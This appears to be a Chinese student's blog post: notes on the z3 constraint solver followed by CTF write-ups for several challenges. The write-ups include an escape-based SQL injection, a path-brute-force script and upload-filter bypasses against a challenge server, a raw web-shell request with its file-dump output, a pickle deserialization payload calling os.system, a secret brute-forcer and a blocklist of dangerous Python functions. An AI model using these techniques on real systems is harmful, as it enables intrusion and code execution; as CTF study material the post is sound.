[python/工具] python z3库学习 python的加减乘除位与运算 ctf一把梭

今天在vidar的分享会上
s神跟我们讲了一个python的库叫做z3

可以在python中用这个库解决任何方程(只要有解)
网上找不到任何中文资料=。=看来我只能自己写了

z3库的介绍

Z3 在工业应用中实际上常见于软件验证、程序分析等。然而由于功能实在强大,也被用于很多其他领域。CTF 领域来说,能够用约束求解器搞定的问题常见于密码题、二进制逆向、符号执行、Fuzzing 模糊测试等。此外,著名的二进制分析框架 angr 也内置了一个修改版的 Z3。

z3的安装过程

我差点就放弃这个库了,就是因为一直安装不上。。
后来询问了s神,s神跟我说要用源码安装
给个地址https://pypi.org/project/z3-solver/4.5.1.0/#files(whl文件下载地址)
只能python2,所以我装在虚拟机上了
千万千万不要使用pip install z3,不知道为什么就是不一样。。

安装好了!

安装好了!

z3如何使用!

惊了这个库可以解决所有的方程,如果有解
首先要给所有的设置一个变量,他有很多种变量
Int型他代表整数所有的解都只能是整数,当然也可以用Ints一次性设置多个变量

 

 

还有就是Real型的这个代表的是有理数,可以解出所有的有理数
以及BitVec(常用的)

 

可以设置几位主要是re选手用的吧,这里可以解决位与方程用这个!超级强,后面一个变量设置这个变量有几位,方便位与运算

  • Int型解方程

 

首先是给变量赋值
设置一个解方程的类Solver
然后一个一个添加(这样比较直观)
check一下看看有没有解,最后得出一个解,当然还有另外一种方法

  • Real型解方程

 

直接用solve函数就可以了

  • BitVec型解方程

这些都不算什么,平常都可以解出来
现在有平常解不出来的东西!!!就是向量(位与运算)

 

!!!!惊了这都能解出来以后我再也不用担心计组了

z3的学习连接

writeup总结 *ctf 和 ichunqiu的web simpleweb和VLD

 

* ctf

simpleweb

先贴上给的源码

var net = require('net');

flag='fake_flag';

var server = net.createServer(function(socket) {
   socket.on('data', (data) => { 
       //m = data.toString().replace(/[\n\r]*$/, '');
       ok = true;
       arr = data.toString().split(' ');
       arr = arr.map(Number);
       if (arr.length != 5) 
           ok = false;
       arr1 = arr.slice(0);
       arr1.sort();
       for (var i=0; i<4; i++)
           if (arr1[i+1] == arr1[i] || arr[i] < 0 || arr1[i+1] > 127)
               ok = false;
       arr2 = []
       for (var i=0; i<4; i++)
           arr2.push(arr1[i] + arr1[i+1]);
       val = 0;
       for (var i=0; i<4; i++)
           val = val * 0x100 + arr2[i];
       if (val != 0x23332333)
           ok = false;
       if (ok)
           socket.write(flag+'\n');
       else
           socket.write('nope\n');
   });
   //socket.write('Echo server\r\n');
   //socket.pipe(socket);
});

HOST = '0.0.0.0'
PORT = 23333

server.listen(PORT, HOST);

很简单他的意思就是让我们做一个re把data给逆出来
首先先把arr2给逆出来用取模就可以了
因为我们是倒着逆出来的所以第一个是最后一个=。=

 


接下来有了arr2就可以逆arr1了
知道他们之和就可以依次爆破=。=其实我觉得我这个太麻烦了。。。
发现根本不是顺序输出很奇怪
上网查了一下JS的sort函数才知道

居然是这样排序的!!!!!
然后就找到了那个数组=。=

连上nc 试了第一个发现就行=。=(骗人的吧那个 sort())

flag

flag

Smart? Contract

wocao 又是一道源码题目。。
一道区块链的题目……不做了我太菜了

ichunqiu

web

因为最近一直在听学长说opcode,就是php字节码
就在i春秋中相中了这道题

首先先点进题目很自然的F12

 

看到了这个进入这个地方
应该是要拿这个压缩包
上网查了一下还是不知道该怎么把字节码转换成源码

 

大概就是get flag1&flag2&flag3的三个值和下面的值相等
JMPZ =。=我也有成为bin选手的梦。

那就构造flag1=fvhjjihfcv&flag2=gfuyiyhioyf&flag3=yugoiiyhi

访问之后就有源码了,接下来是审计阶段
可以看到数据的进入和出去都被过滤了

 

 

上php.net了解一下

 

可以知道都被过滤了,然后null字符是就是%00会被转义成\0

有一个莫名其妙的地方

 

就可以输入number为0来将\0的0去掉就只剩下\了,两个\就会将后面那个\转义了而后面的’就逃逸出来
就可以实现sql注入

明显的报错注入=。=,别的我也没试过

 

惊了,报错了=。=我想了想是因为0被去掉了,所以0x7e只剩下了x7e。。。。
然后我将前后的0x7e,都去掉了。发现就一直不行。原来是因为extractvalue必须要第一个参数=。=
下次了解一下。。。就可以构造sql语句了

 

 

查看数据库

 

查看表=。=

然后发现不能查看列了。。。因为0x无法输入进去,惊了
那就

 

 

再用一下substr就可以全部读取了

 

2018-04-14 HITBCTF web

web

upload

首先进网站

F12大法

看到有一个网站

进去之后发现会显示图片的长和宽

可以想一下这个php函数是getimagesize
我查看了一下php.net里面介绍,他检查的是文件头
而且可以通过RFI,远程请求,但是一直不行

看了一下title,what’s path 就想着去找路径
然后我想了一下就想着upload的文件夹
发现有default的图片
就在upload上找自己上传的php。。
陷入死胡同了

之后辉神跟我说这个是windows下的有windows的特性
就是 < = * ; > = ?
用通配符可以看是否访问到网站,之后就可以看到上传到网站的文件夹

#!/usr/bin/env python
import requests
import string

secret = string.ascii_letters + string.digits
a = ''
s = requests.session()
for i in range(39):
    for j in secret:
        url = 'http://47.90.97.18:9999/pic.php?filename=../{}</1523537992.jpg'.format(a+j)
        html = s.get(url)
        if html.content != 'image error':
            a=a+j
            print a

用这个代码可以就爬出了他的文件夹/87194f13726af7ceE27bA2cfE97b60df/
上传了一下就可以访问这下用windows下的特性

1.windows大小写都可以被解析,上传Php
2..php::$DATA这也是一个漏洞
3.%99 在bp下改88——99会解析错误

就可以上传上去了

反弹shell什么的都被禁止了

POST /87194f13726af7ceE27bA2cfE97b60df/1523539229.php HTTP/1.1
Host: 47.90.97.18:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://47.90.97.18:9999/87194f13726af7ceE27bA2cfE97b60df/1523539229.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

c=foreach%20(glob(
"../*")%20as%20%24filename)%20%7B%20echo%20"%24filename%20%3D>%20"%3B
var_dump(file_get_contents(%24filename))%3B%20%7D;
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.6.35
Date: Sat, 14 Apr 2018 03:35:40 GMT
Connection: close
Content-Length: 1542

 ../87194f13726af7cee27ba2cfe97b60df => bool(false)
../admin => bool(false)
../flag.php => string(73) "<?php
echo "flag is here";
//HITB{e5f476c1e4c6dc66278db95f0b5a228a}
?>"
../index.html => string(292) "<head>
 <title>Where Path~?</title>
</head>
    <form action="upload.php" method="post" enctype="multipart/form-data">  
        <input type="file" name="file" value="up"/>  
        <input type="submit" value="upload" name="submit" />  
    </form>  
    <!--pic.php?filename=default.jpg-->"
../pic.php => string(219) "<?php
$path="./87194f13726af7cee27ba2cfe97b60df/";
if(list($width, $height) = @getimagesize($path.$_GET['filename'])){
    echo "width=$width</br>";
    echo "height=$height";
}else {
    echo "image error";
}
?>
"
../system => bool(false)
../upfile => bool(false)
../upload => bool(false)
../upload.php => string(685) "<?php

$BlackList = array('asp','php','jsp','php5','asa','aspx','cer','cgi','phtml','ashx','asmx');
$name = $_FILES['file']['name'];
$extension = substr(strrchr($name,"."),1);
$boo = false; 
$filepath=dirname(__FILE__).'/87194f13726af7cee27ba2cfe97b60df/' ;
if (isset($_POST["submit"])){
    foreach ($BlackList as $key=>$value){  
        if ($value==$extension){
            $boo=true;  
            break;  
            }  
        } 
     if(!$boo){
        $size=$_FILES['file']['size'];  
        $tmp=$_FILES['file']['tmp_name'];
        $time=intval(time());
        $name=$time.'.'.$extension;
        move_uploaded_file($tmp,$filepath.$name); 
        echo $name;  
            }else {  
        echo "no no no...";  
            }  
              
        }  
    
?>"

看到了

python revenge

这道题有源码先下载下来审计一波
有一个cPickle的库,和一个黑名单,那我猜应该是拿shell
cpickle就是反序列化漏洞
上网找了一下反序列化的代码

class Person(object):
    def __init__(self,username,password):
        self.username = username 
        self.password = password 
    def __reduce__(self):
        return (os.system, ('whoami',))
admin = Person('admin','admin')
print '序列化: \n' + cPickle.dumps(admin)
d=cPickle.dumps(admin)
print '命令执行结果:\n'
cPickle.loads(d)

但是这个反序列化漏洞得绕过两个加密
有一个4长度的secret不过可以爆破随便拿一个下来

import itertools,string,hashlib
_string='e041bddb6cc524e63d7de234f81a252ed1e39ba52a175ee51af6f279a3b7a0b3!VnNkYWZhZHNmc2FkZnNhCnAwCi4='
def break_cookie():
    (hash, msg) = _string.split("!")
    for c in itertools.product(string.ascii_letters + string.digits, repeat=4):
        if hashlib.sha256("%s%s" % (msg, "".join(c))).hexdigest() == hash:
            print("".join(c))

break_cookie()

可以跑出来他的密码是

有这个就很简单了

然后看了一下黑名单

black_type_list = [eval, execfile, compile, open, file, os.system, os.popen, os.popen2, os.popen3, os.popen4, os.fdopen, os.tmpfile, os.fchmod, os.fchown, os.open, os.openpty, os.read, os.pipe, os.chdir, os.fchdir, os.chroot, os.chmod, os.chown, os.link, os.lchown, os.listdir, os.lstat, os.mkfifo, os.mknod, os.access, os.mkdir, os.makedirs, os.readlink, os.remove, os.removedirs, os.rename, os.renames, os.rmdir, os.tempnam, os.tmpnam, os.unlink, os.walk, os.execl, os.execle, os.execlp, os.execv, os.execve, os.dup, os.dup2, os.execvp, os.execvpe, os.fork, os.forkpty, os.kill, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe, os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, pickle.load, pickle.loads, cPickle.load, cPickle.loads, subprocess.call, subprocess.check_call, subprocess.check_output, subprocess.Popen, commands.getstatusoutput, commands.getoutput, commands.getstatus, glob.glob, linecache.getline, shutil.copyfileobj, shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive, dircache.listdir, dircache.opendir, io.open, popen2.popen2, popen2.popen3, popen2.popen4, timeit.timeit, timeit.repeat, sys.call_tracing, code.interact, code.compile_command, codeop.compile_command, pty.spawn, posixfile.open, posixfile.fileopen]

没有过滤input()函数
这里的话
在python2中的input函数跟python3不一样,在python2中的input是eval(raw_input())
有密文了就很简单了=。=可是我一直报错。。。。